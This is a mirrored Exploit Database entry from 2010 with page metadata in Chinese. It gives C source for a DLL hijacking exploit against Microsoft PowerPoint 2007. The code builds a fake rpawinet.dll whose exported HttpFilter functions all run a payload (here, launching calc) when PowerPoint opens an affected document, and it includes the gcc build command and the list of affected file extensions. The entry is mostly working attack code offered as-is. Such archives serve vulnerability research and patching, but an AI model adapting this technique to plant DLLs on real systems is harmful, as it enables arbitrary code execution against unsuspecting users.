Microsoft PowerPoint 2007 – ‘rpawinet.dll’ DLL Hijacking

• Exploit Database
• 115 阅读

• 作者： storm
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14782/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  /*   Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) Date: August 25, 2010 Author: storm (storm@gonullyourself.org) Version: 2007 (12.0.6535.5002) SP2 Tested on: Windows Vista SP2   http://www.gonullyourself.org/   gcc -shared -o rpawinet.dll PowerPoint-DLL.c   .odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.   */   #include <windows.h> #define DllExport __declspec (dllexport)   DllExport void HttpFilterBeginningTransaction() { hax(); } DllExport void HttpFilterClose() { hax(); } DllExport void HttpFilterOnBlockingOps() { hax(); } DllExport void HttpFilterOnResponse() { hax(); } DllExport void HttpFilterOnTransactionComplete() { hax(); } DllExport void HttpFilterOpen() { hax(); }   int hax() { WinExec("calc", 0); exit(0); return 0; }